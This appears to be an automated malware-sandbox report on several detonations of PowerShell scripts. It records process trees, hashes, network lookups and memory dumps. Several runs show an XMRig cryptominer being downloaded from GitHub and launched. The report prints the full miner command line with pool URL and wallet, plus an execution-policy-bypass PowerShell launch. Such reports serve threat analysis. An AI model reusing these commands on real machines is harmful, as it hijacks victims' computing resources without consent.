memory/1040-69-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-70-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-71-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-72-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-73-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-74-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-75-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-76-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-77-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-78-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-79-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-80-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-81-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-82-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-83-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-84-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-85-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-86-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-87-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-88-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-89-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-90-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-91-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-92-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-93-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-94-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-95-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-96-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-97-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-98-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-99-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-100-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-101-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-102-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-103-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-104-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-105-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-106-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-107-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-108-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-109-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-110-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-111-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-112-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-113-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-114-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-115-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

memory/1040-116-0x00007FF6FA880000-0x00007FF6FB4B3000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:49

Platform

win7-20240419-en

Max time kernel

1560s

Max time network

1560s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Network

N/A

Files

memory/2976-4-0x000007FEF591E000-0x000007FEF591F000-memory.dmp

memory/2976-5-0x000000001B630000-0x000000001B912000-memory.dmp

memory/2976-6-0x00000000022D0000-0x00000000022D8000-memory.dmp

memory/2976-8-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

memory/2976-7-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

memory/2976-9-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

memory/2976-10-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

memory/2976-11-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

memory/2976-12-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:34

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1768s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp

Files

memory/1256-0-0x00007FFE7B8E3000-0x00007FFE7B8E5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f3anqpoo.slh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1256-10-0x000001DF3FCA0000-0x000001DF3FCC2000-memory.dmp

memory/1256-11-0x00007FFE7B8E0000-0x00007FFE7C3A1000-memory.dmp

memory/1256-12-0x00007FFE7B8E0000-0x00007FFE7C3A1000-memory.dmp

memory/1256-14-0x00007FFE7B8E0000-0x00007FFE7C3A1000-memory.dmp

memory/1256-15-0x000001DF59040000-0x000001DF59052000-memory.dmp

memory/1256-16-0x000001DF3FCE0000-0x000001DF3FCEA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2836-47-0x00000197F8500000-0x00000197F8520000-memory.dmp

memory/2836-48-0x00000197F8550000-0x00000197F8570000-memory.dmp

memory/2836-49-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-51-0x00000197F8690000-0x00000197F86B0000-memory.dmp

memory/2836-50-0x00000197F8670000-0x00000197F8690000-memory.dmp

memory/1256-53-0x00007FFE7B8E3000-0x00007FFE7B8E5000-memory.dmp

memory/2836-52-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/1256-54-0x00007FFE7B8E0000-0x00007FFE7C3A1000-memory.dmp

memory/2836-55-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-58-0x00000197F8690000-0x00000197F86B0000-memory.dmp

memory/2836-57-0x00000197F8670000-0x00000197F8690000-memory.dmp

memory/2836-56-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-59-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-60-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-61-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-62-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-63-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-64-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-65-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-66-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-67-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-68-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-69-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-70-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-71-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-72-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-73-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-74-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-75-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-76-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-77-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-78-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-79-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-80-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-81-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-82-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-83-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-84-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-85-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-86-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-87-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-88-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-89-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-90-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-91-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-92-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-93-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-94-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-95-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-96-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-97-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-98-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-99-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-100-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-101-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-102-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-103-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-104-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-105-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-106-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-107-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-108-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-109-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-110-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-111-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-112-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-113-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-114-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-115-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-116-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

memory/2836-117-0x00007FF791B80000-0x00007FF7927B3000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:34

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1762s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp

Files

memory/3900-4-0x00007FFC8AAB3000-0x00007FFC8AAB4000-memory.dmp

memory/3900-5-0x0000017D55230000-0x0000017D55252000-memory.dmp

memory/3900-7-0x00007FFC8AAB0000-0x00007FFC8B49C000-memory.dmp

memory/3900-9-0x0000017D552E0000-0x0000017D55356000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hlqesmbe.5jh.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3900-10-0x00007FFC8AAB0000-0x00007FFC8B49C000-memory.dmp

memory/3900-25-0x00007FFC8AAB0000-0x00007FFC8B49C000-memory.dmp

memory/3900-61-0x0000017D55470000-0x0000017D5547A000-memory.dmp

memory/3900-48-0x0000017D55480000-0x0000017D55492000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4588-90-0x0000013D3C9A0000-0x0000013D3C9C0000-memory.dmp

memory/4588-91-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-92-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/3900-93-0x00007FFC8AAB3000-0x00007FFC8AAB4000-memory.dmp

memory/3900-94-0x00007FFC8AAB0000-0x00007FFC8B49C000-memory.dmp

memory/3900-95-0x00007FFC8AAB0000-0x00007FFC8B49C000-memory.dmp

memory/4588-96-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-97-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-98-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-99-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-100-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-101-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-102-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-103-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-104-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-105-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-106-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-107-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-108-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-109-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-110-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-111-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-112-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-113-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-114-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-115-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-116-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-117-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-118-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-119-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-120-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-121-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-122-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-123-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-124-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-125-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-126-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-127-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-128-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-129-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-130-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-131-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-132-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-133-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-134-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-135-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-136-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-137-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-138-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-139-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-140-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-141-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-142-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-143-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-144-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-145-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-146-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-147-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-148-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-149-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-150-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-151-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-152-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-153-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-154-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-155-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

memory/4588-156-0x00007FF6769F0000-0x00007FF677623000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:44

Platform

win11-20240508-en

Max time kernel

1788s

Max time network

1793s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
